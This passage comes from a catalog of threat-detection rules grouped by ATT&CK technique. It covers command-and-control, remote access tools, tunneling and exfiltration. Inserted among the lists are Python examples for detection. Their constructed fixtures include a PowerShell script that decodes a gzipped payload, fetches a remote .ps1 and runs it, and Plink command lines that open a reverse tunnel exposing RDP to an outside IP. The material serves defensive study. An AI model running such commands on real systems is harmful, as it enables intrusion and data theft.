- Splunk PowerShell WebRequest Using Memory Stream production
- Sigma PrintBrm ZIP Creation of Extraction test
- YARA-L PrintBrm ZIP Creation of Extraction
- Sigma Process Execution From WebDAV Share experimental
- Splunk ProtocolHandler.exe File Download (PowerShell)
- Splunk ProtocolHandler.exe File Download (Sysmon)
- Splunk ProtocolHandler.exe File Download (Windows Event Log)
- Sigma PUA - Nimgrab Execution test
- YARA-L PUA - Nimgrab Execution
- Sigma Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server experimental
- Elastic Remote File Copy via TeamViewer production
- Sigma Remote File Download Via Desktopimgdownldr Utility test
- Elastic Remote File Download via Desktopimgdownldr Utility production
- Sigma Remote File Download Via Findstr.EXE test
- Elastic Remote File Download via MpCmdRun production
- Elastic Remote File Download via PowerShell production
- Elastic Remote File Download via Script Interpreter production
- Sigma Replace.exe Usage test
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Sigma Suspicious CertReq Command to Download experimental
- YARA-L Suspicious Certreq Command to Download
- Elastic Suspicious CertUtil Commands production
- Elastic Suspicious Command Prompt Network Connection production
- Splunk Suspicious Curl Network Connection experimental
- Sigma Suspicious Curl.EXE Download test
- YARA-L Suspicious Curl.EXE Download
- Sigma Suspicious Deno File Written from Remote Source experimental
- Sigma Suspicious Desktopimgdownldr Command test
- Sigma Suspicious Desktopimgdownldr Target File test
- Sigma Suspicious Diantz Download and Compress Into a CAB File test
- Sigma Suspicious Download From File-Sharing Website Via Bitsadmin test
- Sigma Suspicious Download from Office Domain test
- Sigma Suspicious Download Via Certutil.EXE test
- Sigma Suspicious Dropbox API Usage test
- Elastic Suspicious Execution from a WebDav Share production
- Elastic Suspicious Execution from INET Cache production
- Elastic Suspicious Execution from VS Code Extension production
- Sigma Suspicious Extrac32 Execution test
- Sigma Suspicious File Created by ArcSOC.exe experimental
- Sigma Suspicious File Downloaded From Direct IP Via Certutil.EXE test
- Sigma Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE test
- Splunk Suspicious File written to Disk (Windows Event Log)
- Sigma Suspicious Invoke-WebRequest Execution test
- YARA-L Suspicious Invoke-WebRequest Execution
- Sigma Suspicious Invoke-WebRequest Execution With DirectIP test
- Elastic Suspicious JavaScript Execution via Deno production
- Sigma Suspicious Non-Browser Network Communication With Telegram API test
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Windows Command Shell Arguments production
- Elastic Suspicious Windows Powershell Arguments production
- Splunk Temporary File Executed from Public Folder (Sysmon)
- Splunk Temporary File Executed from Public Folder (Windows Event Log)
- Sigma Uncommon Network Connection Initiated By Certutil.EXE test
- Splunk Unusual HTTP Download (Sysmon)
- Splunk Visio.exe File Download (PowerShell)
- Splunk Visio.exe File Download (Sysmon)
- Splunk Visio.exe File Download (Windows Event Log)
- Splunk Windows Cabinet File Extraction Via Expand production
- Splunk Windows Curl Download to Suspicious Path production
- Splunk Windows Curl Upload to Remote Destination production
- Splunk Windows DLL Module Loaded in Temp Dir production
- Splunk Windows DNS Query Request To TinyUrl production
- Splunk Windows File Download Via CertUtil production
- Splunk Windows File Download Via PowerShell production
- Splunk Windows Ingress Tool Transfer Using Explorer production
- Splunk Windows Ldifde Directory Object Behavior production
- Splunk Windows Process Execution From RDP Share production
- Splunk Windows SQL Spawning CertUtil experimental
- Splunk Windows SSH Proxy Command production
- Splunk WinRAR Spawning Shell Application production
Data Encoding T1132 11 rules
- Splunk Certutil Execution (Sysmon)
- Splunk Certutil Execution (Windows Event Log)
- Splunk Certutil Obfuscate_Encode Files (EDR)
- Splunk Certutil Obfuscate_Encode Files (PowerShell)
- Splunk Certutil Obfuscate_Encode Files (Sysmon)
- Splunk Certutil Obfuscate_Encode Files (Windows Event Log)
- Sigma DNS Exfiltration and Tunneling Tools Execution test
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Sigma Gzip Archive Decode Via PowerShell test
- Sigma Suspicious FromBase64String Usage On Gzip Archive - Process Creation test
- Sigma Suspicious FromBase64String Usage On Gzip Archive - Ps Script test
Data Encoding: Standard Encoding T1132.001 5 rules
- Sigma DNS Exfiltration and Tunneling Tools Execution test
- Elastic File Compressed or Archived into Common Format by Unsigned Process production
- Sigma Gzip Archive Decode Via PowerShell test
- Sigma Suspicious FromBase64String Usage On Gzip Archive - Process Creation test
- Sigma Suspicious FromBase64String Usage On Gzip Archive - Ps Script test
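The Gzip and FromBase64String rules in the two T1132 lists above all key on the same PowerShell idiom: a base64 blob is decoded, inflated through GZipStream and handed to Invoke-Expression. The following Python is an added illustration of that decode step and is not the logic of any catalog rule; the script block it inspects is constructed in place, and the 40-character base64 threshold and the UTF-16LE heuristic are assumptions for the example.

```python
"""Added example: unpack the FromBase64String-plus-GZipStream pattern (T1132).

Illustrative code, not any catalog rule's logic. The script block is constructed here.
"""
import base64
import binascii
import gzip
import re
import zlib
from typing import List, Tuple

# A base64 run this long is assumed to be a payload rather than an option value.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Both API names must be present for the decode-and-inflate pattern; PowerShell is
# case-insensitive, so the script is lower-cased before the check.
MARKERS = ("frombase64string", "gzipstream")
GZIP_MAGIC = b"\x1f\x8b"


def has_gzip_decode_pattern(script: str) -> bool:
    """True when the script both base64-decodes and gunzips something."""
    lowered = script.lower()
    return all(marker in lowered for marker in MARKERS)


def _decode_text(data: bytes) -> Tuple[str, str]:
    """Pick UTF-16LE when odd byte positions are mostly NUL (ASCII in UTF-16LE), else UTF-8."""
    if len(data) >= 2 and data[1::2].count(0) > len(data) // 4:
        return "utf-16-le", data.decode("utf-16-le", errors="replace")
    return "utf-8", data.decode("utf-8", errors="replace")


def decode_gzip_payloads(script: str) -> List[Tuple[str, str]]:
    """Return (encoding, text) for every base64 blob in the script that gunzips cleanly.

    Blobs that are not valid base64 or whose bytes lack the gzip magic are skipped, so
    a script that merely mentions GZipStream yields nothing.
    """
    found = []
    for blob in B64_RUN.findall(script):
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue
        if not raw.startswith(GZIP_MAGIC):
            continue
        try:
            inflated = gzip.decompress(raw)
        except (OSError, EOFError, zlib.error):
            continue
        found.append(_decode_text(inflated))
    return found


def build_sample_script(payload_cmd: str) -> str:
    """Constructed script block of the shape the rules describe (not captured from malware).

    It gunzips a base64 blob into a UTF-16LE string and hands it to Invoke-Expression.
    """
    b64 = base64.b64encode(gzip.compress(payload_cmd.encode("utf-16-le"))).decode()
    return (
        "$s=[IO.Compression.GZipStream]::new("
        f"[IO.MemoryStream][Convert]::FromBase64String('{b64}'),"
        "[IO.Compression.CompressionMode]::Decompress);"
        "IEX ([IO.StreamReader]::new($s,[Text.Encoding]::Unicode)).ReadToEnd()"
    )


def triage(script: str) -> dict:
    """Cheap pattern check first, then the decode so the analyst sees the real command."""
    matched = has_gzip_decode_pattern(script)
    payloads = decode_gzip_payloads(script) if matched else []
    return {"pattern_matched": matched,
            "payload_count": len(payloads),
            "payloads": [text for _, text in payloads]}


if __name__ == "__main__":
    sample = build_sample_script("Invoke-WebRequest http://example.invalid/a.ps1 -OutFile $env:TEMP\\a.ps1")
    print(triage(sample))
```

The pattern check alone is what a process-creation or script-block rule can afford; the decode is the follow-up an analyst runs on the hit, and it is what turns "suspicious FromBase64String usage" into the actual downloaded-and-executed command.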
Remote Access Tools T1219 84 rules
- Splunk AnyDesk Command Line Execution (Sysmon)
- Splunk AnyDesk Command Line Execution (Windows Event Log)
- Splunk AnyDesk Execution from Suspicious Folder (Sysmon)
- Splunk AnyDesk Execution from Suspicious Folder (Windows Event Log)
- Splunk AnyDesk Silent Install (Sysmon)
- Splunk AnyDesk Silent Install (Windows Event Log)
- Sigma Anydesk Temporary Artefact test
- Sigma Atera Agent Installation test
- Splunk AteraAgent Installation - Windows (Sysmon)
- Splunk AteraAgent Installation - Windows (Windows Event Log)
- Elastic Attempt to Establish VScode Remote Tunnel production
- Splunk Detect Remote Access Software Usage DNS production
- Splunk Detect Remote Access Software Usage File production
- Splunk Detect Remote Access Software Usage FileInfo production
- Splunk Detect Remote Access Software Usage Process production
- Splunk Detect Remote Access Software Usage Registry production
- Sigma DNS Query To AzureWebsites.NET By Non-Browser Process test
- Sigma DNS Query To Remote Access Software Domain From Non-Browser App test
- Elastic First Time Seen DNS Query to RMM Domain production
- Elastic First Time Seen Remote Monitoring and Management Tool production
- Sigma GoToAssist Temporary Installation Artefact test
- Sigma HackTool - Inveigh Execution Artefacts test
- Sigma HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators test
- Sigma Hijack Legit RDP Session to Move Laterally test
- Sigma Installation of TeamViewer Desktop test
- Sigma Mesh Agent Service Installation test
- Sigma Mstsc.EXE Execution With Local RDP File test
- Elastic Multiple Remote Management Tool Vendors on Same Host production
- Elastic NetSupport Manager Execution from an Unusual Path production
- Sigma OpenEDR Spawning Command Shell experimental
- Sigma Potential Amazon SSM Agent Hijacking test
- Sigma Potential CSharp Streamer RAT Loading .NET Executable Image test
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential Remote Desktop Connection to Non-Domain Host test
- Sigma Potential SocGholish Second Stage C2 DNS Query test
- Sigma Potentially Suspicious File Creation by OpenEDR's ITSMService experimental
- Sigma QuickAssist Execution experimental
- Splunk Remote Access Software Execution (Sysmon)
- Splunk Remote Access Software Execution (Windows Event Log)
- Sigma Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions test
- Sigma Remote Access Tool - AnyDesk Execution test
- Sigma Remote Access Tool - Anydesk Execution From Suspicious Folder test
- Sigma Remote Access Tool - AnyDesk Incoming Connection experimental
- Sigma Remote Access Tool - AnyDesk Piped Password Via CLI test
- Sigma Remote Access Tool - AnyDesk Silent Installation test
- Sigma Remote Access Tool - GoToAssist Execution test
- Sigma Remote Access Tool - LogMeIn Execution test
- Sigma Remote Access Tool - MeshAgent Command Execution via MeshCentral test
- Sigma Remote Access Tool - NetSupport Execution test
- Sigma Remote Access Tool - Potential MeshAgent Execution - Windows experimental
- Sigma Remote Access Tool - Renamed MeshAgent Execution - Windows experimental
- Sigma Remote Access Tool - ScreenConnect Execution test
- Sigma Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution test
- Sigma Remote Access Tool - Simple Help Execution test
- Sigma Remote Access Tool - TacticalRMM Agent Registration to Potentially Attacker-Controlled Server experimental
- Sigma Remote Access Tool - UltraViewer Execution test
- Elastic Remote File Copy via TeamViewer production
- Elastic Remote Management Access Launch After MSI Install production
- Sigma Renamed Visual Studio Code Tunnel Execution test
- Sigma ScreenConnect Temporary Installation Artefact test
- Splunk SimpleHelp Remote Access Tool Execution (Sysmon)
- Splunk SimpleHelp Remote Access Tool Execution (Windows Event Log)
- Splunk SimpleHelp Remote Access Tool Service Installation (Windows Event Log)
- Splunk Suspicious AteraAgent Installation - Windows (PowerShell)
- Splunk Suspicious AteraAgent Installation - Windows (Sysmon)
- Splunk Suspicious AteraAgent Installation - Windows (Windows Event Log)
- Sigma Suspicious Binary Writes Via AnyDesk test
- Sigma Suspicious Mstsc.EXE Execution With Local RDP File test
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Shell Execution via Velociraptor production
- Sigma Suspicious TSCON Start as SYSTEM test
- Sigma Suspicious Velociraptor Child Process experimental
- Sigma TacticalRMM Service Installation test
- Sigma TeamViewer Domain Query By Non-TeamViewer Application test
- Sigma TeamViewer Remote Session test
- Splunk Temporary ConnectWise xml File Activity (Windows Event Log)
- YARA-L Uncommon or Suspicious RMM Tool Execution Detected
- Sigma Use of UltraVNC Remote Access Software test
- Sigma Visual Studio Code Tunnel Execution test
- Splunk Windows Level RMM PowerShell Script Installer production
- Splunk Windows Level RMM Watchdog Task Created production
- Splunk Windows Remote Access Software BRC4 Loaded Dll production
- Splunk Windows Remote Access Software RMS Registry production
- Splunk Windows RMM Tool Execution production
Remote Access Tools: Remote Desktop Software T1219.002 45 rules
- Sigma Anydesk Temporary Artefact test
- Sigma Atera Agent Installation test
- Sigma DNS Query To AzureWebsites.NET By Non-Browser Process test
- Sigma DNS Query To Remote Access Software Domain From Non-Browser App test
- Elastic First Time Seen DNS Query to RMM Domain production
- Elastic First Time Seen Remote Monitoring and Management Tool production
- Sigma GoToAssist Temporary Installation Artefact test
- Sigma HackTool - Inveigh Execution Artefacts test
- Sigma HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators test
- Sigma Hijack Legit RDP Session to Move Laterally test
- Sigma Installation of TeamViewer Desktop test
- Sigma Mesh Agent Service Installation test
- Sigma Mstsc.EXE Execution With Local RDP File test
- Elastic Multiple Remote Management Tool Vendors on Same Host production
- Sigma Potential Amazon SSM Agent Hijacking test
- Sigma Potential CSharp Streamer RAT Loading .NET Executable Image test
- Sigma Potential Remote Desktop Connection to Non-Domain Host test
- Sigma Potential SocGholish Second Stage C2 DNS Query test
- Sigma QuickAssist Execution experimental
- Sigma Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions test
- Sigma Remote Access Tool - AnyDesk Execution test
- Sigma Remote Access Tool - Anydesk Execution From Suspicious Folder test
- Sigma Remote Access Tool - AnyDesk Incoming Connection experimental
- Sigma Remote Access Tool - AnyDesk Piped Password Via CLI test
- Sigma Remote Access Tool - AnyDesk Silent Installation test
- Sigma Remote Access Tool - GoToAssist Execution test
- Sigma Remote Access Tool - LogMeIn Execution test
- Sigma Remote Access Tool - MeshAgent Command Execution via MeshCentral test
- Sigma Remote Access Tool - NetSupport Execution test
- Sigma Remote Access Tool - Potential MeshAgent Execution - Windows experimental
- Sigma Remote Access Tool - Renamed MeshAgent Execution - Windows experimental
- Sigma Remote Access Tool - ScreenConnect Execution test
- Sigma Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution test
- Sigma Remote Access Tool - Simple Help Execution test
- Sigma Remote Access Tool - UltraViewer Execution test
- Elastic Remote Management Access Launch After MSI Install production
- Sigma ScreenConnect Temporary Installation Artefact test
- Sigma Suspicious Binary Writes Via AnyDesk test
- Sigma Suspicious Mstsc.EXE Execution With Local RDP File test
- Elastic Suspicious Shell Execution via Velociraptor production
- Sigma Suspicious TSCON Start as SYSTEM test
- Sigma TacticalRMM Service Installation test
- Sigma TeamViewer Domain Query By Non-TeamViewer Application test
- Sigma TeamViewer Remote Session test
- Sigma Use of UltraVNC Remote Access Software test
Dynamic Resolution T1568 8 rules
- Sigma Communication To Ngrok Tunneling Service Initiated test
- Elastic Connection to Commonly Abused Web Services production
- Kusto Detect DNS queries reporting multiple errors from different clients - Static threshold based (ASIM DNS Solution) available
- Kusto Detect excessive NXDOMAIN DNS queries - Static threshold based (ASIM DNS Solution) available
- Kusto Excessive NXDOMAIN DNS Queries (ASIM DNS Schema)
- Kusto Potential DGA(Domain Generation Algorithm) detected via Repetitive Failures - Static threshold based (ASIM DNS Solution) available
- Kusto RecordedFuture Threat Hunting Domain All Actors
- Kusto RecordedFuture Threat Hunting IP All Actors
Dynamic Resolution: Domain Generation Algorithms T1568.002 2 rules
- Sigma Communication To Ngrok Tunneling Service Initiated test
- Elastic Connection to Commonly Abused Web Services production
Non-Standard Port T1571 4 rules
- Sigma Communication To Uncommon Destination Ports test
- Kusto Potential beaconing activity (ASIM Network Session schema) available
- Sigma Potentially Suspicious Malware Callback Communication test
- Sigma Testing Usage of Uncommonly Used Port test
Protocol Tunneling T1572 54 rules
- Sigma Cloudflared Tunnel Connections Cleanup test
- Sigma Cloudflared Tunnel Execution test
- Sigma Cloudflared Tunnels Related DNS Requests test
- Sigma Communication To LocaltoNet Tunneling Service Initiated test
- Sigma Communication To Ngrok Tunneling Service Initiated test
- Sigma DNS Query To Devtunnels Domain test
- Splunk Named Pipe Created (Sysmon)
- Sigma Network Connection Initiated To BTunnels Domains test
- Sigma Network Connection Initiated To Cloudflared Tunnels Domains test
- Sigma Network Connection Initiated To DevTunnels Domain test
- Sigma Network Connection Initiated To Visual Studio Code Tunnels Domain test
- Splunk ngrok Execution - Windows (PowerShell)
- Splunk ngrok Execution - Windows (Sysmon)
- Splunk ngrok Execution - Windows (Windows Event Log)
- Splunk Ngrok Reverse Proxy on Network production
- Kusto Ngrok Reverse Proxy on Network (ASIM DNS Solution) available
- Sigma Port Forwarding Activity Via SSH.EXE test
- Elastic Port Forwarding Rule Addition production
- Elastic Potential DNS Tunneling via NsLookup production
- Splunk Potential ngrok Tunnel - Windows (Windows Event Log)
- Elastic Potential Protocol Tunneling via Cloudflared production
- Elastic Potential Protocol Tunneling via Yuze production
- Sigma Potential RDP Tunneling Via Plink test
- Sigma Potential RDP Tunneling Via SSH test
- Kusto Potential Remote Desktop Tunneling available
- Elastic Potential Remote Desktop Tunneling Detected production
- Sigma Potentially Suspicious Usage Of Qemu test
- Sigma Process Initiated Network Connection To Ngrok Domain test
- Sigma PUA - 3Proxy Execution test
- Sigma PUA - Ngrok Execution test
- Splunk QEMU Network Tunneling - Windows (PowerShell)
- Splunk QEMU Network Tunneling - Windows (Sysmon)
- Splunk QEMU Network Tunneling - Windows (Windows Event Log)
- Sigma RDP Over Reverse SSH Tunnel test
- Sigma RDP to HTTP or HTTPS Target Ports test
- Sigma RDP tunneling configuration enabled for port forwarding experimental
- Sigma RDP tunneling via ngrok detected experimental
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (PowerShell)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Sysmon)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Windows Event Log)
- Sigma Silence.EDA Detection test
- Splunk ssh.exe Execution (Sysmon)
- Splunk ssh.exe Execution (Windows Event Log)
- Sigma Suspicious Plink Port Forwarding test
- Splunk Tunneling Process Created (PowerShell)
- Splunk Tunneling Process Created (Sysmon)
- Splunk Tunneling Process Created (Windows Event Log)
- Sigma Tunneling Tool Execution test
- Splunk Windows Ngrok Reverse Proxy Usage production
- Splunk Windows Potential Cloudflared Network Connection production
- Splunk Windows Potential Cloudflared Tunnel Execution production
- Splunk Windows Protocol Tunneling with Plink production
- Splunk Windows SoftEther VPN Masquerading as Legitimate Binary production
- Splunk Windows SSH Proxy Command production
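Several T1572 rules above (Potential RDP Tunneling Via Plink, Potential RDP Tunneling Via SSH, RDP Over Reverse SSH Tunnel, Port Forwarding Activity Via SSH.EXE) describe the same behaviour: a tunnelling client invoked with -R or -L and an RDP port in the forwarding spec. The Python below is an added example of that check over constructed Sysmon-style process-creation records; it is not the logic of any listed rule. The watch list of tool names, the severities, and the use of OriginalFileName to catch a renamed binary are assumptions for the example.

```python
"""Added example: flag SSH/Plink port forwarding that exposes RDP (T1572).

Not a catalog rule. Events are constructed to resemble Sysmon Event ID 1 fields;
the watch list, severities and field names are assumptions for the example.
"""
import re
import shlex
from dataclasses import dataclass, asdict
from typing import Iterable, List, Optional

TUNNEL_TOOLS = {"plink", "ssh"}      # assumed watch list, compared without .exe
RDP_PORT = "3389"
# OpenSSH and Plink share -L/-R/-D; the spec may be attached (-R1234:h:p) or separate.
FORWARD_FLAG = re.compile(r"^-(R|L|D)(.*)$")


@dataclass
class Finding:
    rule: str
    severity: str
    image: str
    command_line: str
    renamed: bool


def _tool_name(path: str) -> str:
    """Lower-case file name without extension: 'C:\\x\\Plink.exe' -> 'plink'."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def _split_cmdline(command_line: str) -> List[str]:
    """Windows-style split that keeps quoted paths together; no backslash escaping."""
    try:
        return shlex.split(command_line, posix=False)
    except ValueError:            # unbalanced quote: fall back to whitespace split
        return command_line.split()


def _forward_specs(argv: List[str]):
    """Yield (flag, spec) for each -R/-L/-D, whether the spec is attached or the next token."""
    i = 1
    while i < len(argv):
        m = FORWARD_FLAG.match(argv[i])
        if m:
            flag, attached = m.groups()
            if attached:
                yield flag, attached
            elif i + 1 < len(argv):
                yield flag, argv[i + 1]
                i += 1
        i += 1


def evaluate(event: dict) -> Optional[Finding]:
    """Return a Finding when a tunnelling tool is invoked with port forwarding, else None."""
    image_tool = _tool_name(event.get("Image", ""))
    original_tool = _tool_name(event.get("OriginalFileName", ""))
    if image_tool not in TUNNEL_TOOLS and original_tool not in TUNNEL_TOOLS:
        return None
    # OriginalFileName comes from the PE version resource, so it survives a rename on disk.
    renamed = image_tool not in TUNNEL_TOOLS and original_tool in TUNNEL_TOOLS
    command_line = event.get("CommandLine", "")
    specs = list(_forward_specs(_split_cmdline(command_line)))
    if not specs:
        return None
    # -L/-R specs look like [bind:]port:host:hostport; RDP anywhere in them is the signal.
    exposes_rdp = any(flag != "D" and RDP_PORT in spec.split(":") for flag, spec in specs)
    if exposes_rdp:
        rule, severity = "RDP tunnelled over SSH/Plink", "high"
    else:
        rule, severity = "Port forwarding via SSH/Plink", "medium"
    return Finding(rule, severity, event.get("Image", ""), command_line, renamed)


def run(events: Iterable[dict]) -> List[dict]:
    return [asdict(f) for f in map(evaluate, events) if f is not None]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\PuTTY\plink.exe", "OriginalFileName": "Plink",
     "CommandLine": r'"C:\Program Files\PuTTY\plink.exe" -ssh -R 12345:127.0.0.1:3389 198.51.100.7 -l u -pw p'},
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe", "OriginalFileName": "ssh.exe",
     "CommandLine": "ssh.exe -L 8080:intranet:80 jump.example"},
    {"Image": r"C:\Users\Public\svchost.exe", "OriginalFileName": "Plink",
     "CommandLine": r"C:\Users\Public\svchost.exe -R3389:127.0.0.1:3389 198.51.100.7"},
    {"Image": r"C:\Windows\System32\OpenSSH\ssh.exe", "OriginalFileName": "ssh.exe",
     "CommandLine": "ssh.exe admin@jump.example"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe -R 3389:x:3389"},
]

if __name__ == "__main__":
    for finding in run(SAMPLE_EVENTS):
        print(finding)
```

The third sample is the case the "Renamed" rules in this catalog exist for: the image name says svchost.exe, but the version resource still says Plink, and the forwarding spec still names 3389. A rule that matches only on Image misses it.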
Encrypted Channel T1573 6 rules
- Elastic Connection to Commonly Abused Free SSL Certificate Providers production
- Kusto Detect DNS queries reporting multiple errors from different clients - Static threshold based (ASIM DNS Solution) available
- Sigma Kalambur Backdoor Curl TOR SOCKS Proxy Execution experimental
- Sigma Potential Pikabot C2 Activity test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Suspicious SSL Connection test
Exfiltration
Exfiltration Over Other Network Medium T1011 1 rule
- Splunk Windows Network Connection From Program In Suspect Location production
Automated Exfiltration T1020 10 rules
- Kusto Deimos Component Execution available
- Splunk Detect RClone Command-Line Usage production
- Splunk Detect Renamed RClone production
- Splunk Executable Create Script Process (PowerShell)
- Splunk Executable Create Script Process (Sysmon)
- Splunk Executable Create Script Process (Windows Event Log)
- Sigma Mail Forwarding/Redirecting Activity Via ExchangePowerShell Cmdlet experimental
- Sigma PowerShell Script With File Hostname Resolving Capabilities test
- Sigma PowerShell Script With File Upload Capabilities test
- Splunk Windows Mustang Panda USB Tool Execution production
Data Transfer Size Limits T1030 3 rules
Exfiltration Over C2 Channel T1041 14 rules
- Kusto Files Copied to USB Drives available
- Sigma Network Communication Initiated To Portmap.IO Domain test
- Splunk Potential Telegram API Request Via CommandLine production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell ICMP Data Exfiltration (PowerShell)
- Kusto RecordedFuture Threat Hunting IP All Actors
- Splunk Script Connected to External Destination - Windows (Sysmon)
- Splunk Script Connected to External Destination - Windows (Windows Event Log)
- Sigma Shai-Hulud NPM Package Malicious Exfiltration via Curl experimental
- Sigma Tunneling Tool Execution test
- Sigma Vice Society directory crawling script for data exfiltration (via ps_script) stable
- Splunk Windows Exfiltration Over C2 Via Invoke RestMethod production
- Splunk Windows Exfiltration Over C2 Via Powershell UploadString production
- Kusto Windows host username encoded in base64 web request
Exfiltration Over Alternative Protocol T1048 47 rules
- Sigma BITS payload downloaded via commandline experimental
- Sigma BITS payload downloaded via PowerShell experimental
- Kusto Bitsadmin Activity available
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Sigma Copy From Or To Admin Share Or Sysvol Folder test
- Sigma Data Export From MSSQL Table Via BCP.EXE test
- Kusto Dev-0270 Malicious Powershell usage available
- Kusto DNS events related to ToR proxies (ASIM DNS Schema)
- Sigma DNS Exfiltration and Tunneling Tools Execution test
- Splunk DNS Exfiltration Using Nslookup App production
- Splunk DNS Query Length With High Standard Deviation production
- Splunk Excessive Usage of NSLOOKUP App production
- Splunk Exfiltration via curl.exe - Windows (PowerShell)
- Splunk Exfiltration via curl.exe - Windows (Sysmon)
- Splunk Exfiltration via curl.exe - Windows (Windows Event Log)
- Sigma FTP Connection Open Attempt Via Winscp CLI experimental
- Splunk Potential CVE-2023-23397 (EDR)
- Splunk Potential CVE-2023-23397 (Sysmon)
- Splunk Potential CVE-2023-23397 (Windows Event Log)
- Sigma Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet test
- Elastic Potential Data Exfiltration via Rclone production
- Sigma Powershell DNSExfiltration test
- Sigma PowerShell ICMP Exfiltration test
- Sigma PUA - Restic Backup Tool Execution experimental
- Splunk PuTTY Secure Copy Client Execution (PowerShell)
- Splunk PuTTY Secure Copy Client Execution (Sysmon)
- Splunk PuTTY Secure Copy Client Execution (Windows Event Log)
- Splunk Rclone Execution (PowerShell)
- Splunk Rclone Execution (Sysmon)
- Splunk Rclone Execution (Windows Event Log)
- Sigma Suspicious Outbound SMTP Connections test
- Sigma Suspicious Redirection to Local Admin Share test
- Sigma Suspicious WebDav Client Execution Via Rundll32.EXE test
- Sigma Tap Driver Installation test
- Sigma Tap Driver Installation - Security test
- Sigma Tap Installer Execution test
- Sigma WebDav Client Execution Via Rundll32.EXE test
- Splunk Windows FTP Exfiltration (PowerShell)
- Splunk Windows FTP Exfiltration (Sysmon)
- Splunk Windows FTP Exfiltration (Windows Event Log)
- Elastic Windows Registry File Creation in SMB Share production
- Splunk Windows Rundll32 WebDAV Request production
- Splunk Windows Rundll32 WebDav With Network Connection production
- Splunk WinSCP Execution (Windows Event Log)
- Sigma Winscp Execution From Non Standard Folder experimental
Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol T1048.003 18 rules
- Splunk BITSadmin Execution (PowerShell)
- Splunk BITSadmin Execution (Sysmon)
- Splunk BITSadmin Execution (Windows Event Log)
- Splunk DNS Query Length With High Standard Deviation production
- Splunk Potential CVE-2023-23397 (EDR)
- Splunk Potential CVE-2023-23397 (Sysmon)
- Splunk Potential CVE-2023-23397 (Windows Event Log)
- Sigma Potential Data Exfiltration Over SMTP Via Send-MailMessage Cmdlet test
- Sigma PowerShell ICMP Exfiltration test
- Splunk Rclone Execution (PowerShell)
- Splunk Rclone Execution (Sysmon)
- Splunk Rclone Execution (Windows Event Log)
- Sigma Suspicious Outbound SMTP Connections test
- Sigma Suspicious WebDav Client Execution Via Rundll32.EXE test
- Sigma WebDav Client Execution Via Rundll32.EXE test
- Splunk Windows Rundll32 WebDAV Request production
- Splunk Windows Rundll32 WebDav With Network Connection production
- Splunk WinSCP Execution (Windows Event Log)
Exfiltration Over Physical Medium T1052 1 rule
- Elastic First Time Seen Removable Device production
Exfiltration Over Physical Medium: Exfiltration over USB T1052.001 1 rule
- Elastic First Time Seen Removable Device production
Transfer Data to Cloud Account T1537 1 rule
- Splunk High Frequency Copy Of Files In Network Share production
Exfiltration Over Web Service T1567 39 rules
- Sigma Arbitrary File Download Via ConfigSecurityPolicy.EXE test
- Sigma Communication To Ngrok Tunneling Service Initiated test
- Elastic Connection to Commonly Abused Web Services production
- Splunk Data Exfiltration via AWS CLI - Windows (Sysmon)
- Splunk Data Exfiltration via AWS CLI - Windows (Windows Event Log)
- Sigma DNS Query for Anonfiles.com Domain - DNS Client test
- Sigma DNS Query for Anonfiles.com Domain - Sysmon test
- Sigma DNS Query To MEGA Hosting Website test
- Sigma DNS Query To MEGA Hosting Website - DNS Client test
- Sigma DNS Query To Ufile.io test
- Sigma DNS Query To Ufile.io - DNS Client test
- Sigma LOLBAS Data Exfiltration by DataSvcUtil.exe test
- Splunk LOLBAS With Network Traffic production
- Splunk Mega Utility Execution - Windows (Sysmon)
- Splunk Mega Utility Execution - Windows (Windows Event Log)
- Sigma Network Connection Initiated To BTunnels Domains test
- Sigma Network Connection Initiated To Cloudflared Tunnels Domains test
- Sigma Network Connection Initiated To DevTunnels Domain test
- Sigma Network Connection Initiated To Mega.nz test
- Sigma Network Connection Initiated To Visual Studio Code Tunnels Domain test
- Sigma Potential Data Exfiltration Via Curl.EXE test
- Elastic Potential Data Exfiltration via Rclone production
- Elastic Potential File Transfer via Certreq production
- Elastic Potential File Transfer via Curl for Windows production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Process Connection to Mega - Windows (Sysmon)
- Splunk Process Connection to Mega - Windows (Windows Event Log)
- Sigma Process Initiated Network Connection To Ngrok Domain test
- Sigma PUA - Rclone Execution test
- Sigma PUA - Restic Backup Tool Execution experimental
- Sigma Rclone Config File Creation test
- Splunk Rclone Execution (PowerShell)
- Splunk Rclone Execution (Sysmon)
- Splunk Rclone Execution (Windows Event Log)
- Sigma Suspicious Dropbox API Usage test
- Sigma Suspicious Non-Browser Network Communication With Telegram API test
- Splunk Windows Azure Storage Utility Execution Via CLI production
- Splunk Windows Gdrive Binary Activity production
- Splunk Windows OneDrive Share Mounted via Net production
Exfiltration Over Web Service: Exfiltration to Code Repository T1567.001 3 rules
- Elastic Connection to Commonly Abused Web Services production
